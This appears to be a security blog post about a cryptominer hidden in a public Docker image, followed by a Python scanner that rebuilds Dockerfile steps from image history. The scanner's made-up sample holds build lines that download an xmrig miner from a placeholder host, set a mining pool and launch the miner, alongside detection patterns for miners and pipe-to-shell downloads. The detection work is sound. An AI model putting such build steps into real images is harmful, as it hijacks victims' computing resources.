What if the Docker image you just pulled contained hidden malware? Our analysis of the ynprpagamentitk/liferay image reveals just how easily attackers can sneak malicious software—such as cryptominers—into public container registries like Docker Hub. By reverse-engineering this image and reconstructing its Dockerfile, we’ve shown that creating and distributing a harmful container is surprisingly simple.

This exposes a critical weakness in the container ecosystem: anyone can upload an image, and unsuspecting users might unknowingly deploy a compromised container. Attackers rely on this trust, disguising malware inside legitimate-looking images to hijack resources for their own benefit.

To illustrate this risk, we replicated the process by uploading a proof-of-concept Dockerfile to Docker Hub under the repository kebza/cryptomalware. This demonstrates that even today, malicious images can be created and shared with ease—posing a real threat to developers and organizations alike.

This case highlights the urgent need for stronger security measures and better awareness when using public container registries. Without careful inspection, downloading an image could mean handing over your system’s resources to attackers. Whether you’re managing a personal project or a large-scale deployment, vigilance is key to protecting your environment from these hidden dangers.
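One way to do that inspection before running an image is to rebuild its Dockerfile from the build history stored in the image config and scan it for miner indicators. This is an added example, not code from the original analysis; it assumes the `history[].created_by` layout of the image config JSON found in a `docker save` archive, and the sample config and indicator patterns are constructed for illustration.

```python
import json
import re

# Constructed sample: trimmed image config JSON (layout as written by `docker save`).
# Every value is made up for illustration; none comes from a real image.
SAMPLE_CONFIG = json.dumps({"history": [
    {"created_by": "/bin/sh -c #(nop) ADD file:0000 in / "},
    {"created_by": "/bin/sh -c apt-get update && apt-get install -y curl"},
    {"created_by": "/bin/sh -c curl -sL http://files.example.invalid/xmrig.tar.gz | tar xz -C /opt"},
    {"created_by": "/bin/sh -c #(nop)  ENV POOL=stratum+tcp://pool.example.invalid:3333",
     "empty_layer": True},
    {"created_by": "/bin/sh -c #(nop)  ENTRYPOINT [\"/opt/xmrig/xmrig\"]",
     "empty_layer": True},
]})

# Illustrative indicator patterns (assumptions, not an exhaustive list).
INDICATORS = {
    "miner-binary": re.compile(r"\b(xmrig|minerd|cpuminer)\b", re.I),
    "mining-pool-url": re.compile(r"stratum\+(tcp|ssl)://", re.I),
    "pipe-to-shell-or-tar": re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sh|bash|tar)\b", re.I),
}

NOP = re.compile(r"^/bin/sh -c #\(nop\)\s+")  # metadata steps: ENV, CMD, ENTRYPOINT...
RUN = re.compile(r"^/bin/sh -c\s+")           # shell steps recorded by the classic builder

def reconstruct_dockerfile(config_json):
    """Turn history[].created_by entries back into Dockerfile-style lines."""
    lines = []
    for entry in json.loads(config_json).get("history", []):
        cmd = entry.get("created_by", "").strip()
        if NOP.match(cmd):
            lines.append(NOP.sub("", cmd))
        elif RUN.match(cmd):
            lines.append("RUN " + RUN.sub("", cmd))
        elif cmd:
            lines.append(cmd)  # BuildKit already stores "RUN ..." style text
    return lines

def flag_suspicious(lines):
    """Return (line_number, indicator_name, line) for every indicator match."""
    return [(n, name, line)
            for n, line in enumerate(lines, 1)
            for name, rx in INDICATORS.items() if rx.search(line)]

if __name__ == "__main__":
    for n, name, line in flag_suspicious(reconstruct_dockerfile(SAMPLE_CONFIG)):
        print(f"line {n}: {name}: {line}")
```

A clean result only means none of these patterns appeared in the recorded build steps; the layer contents themselves still need scanning.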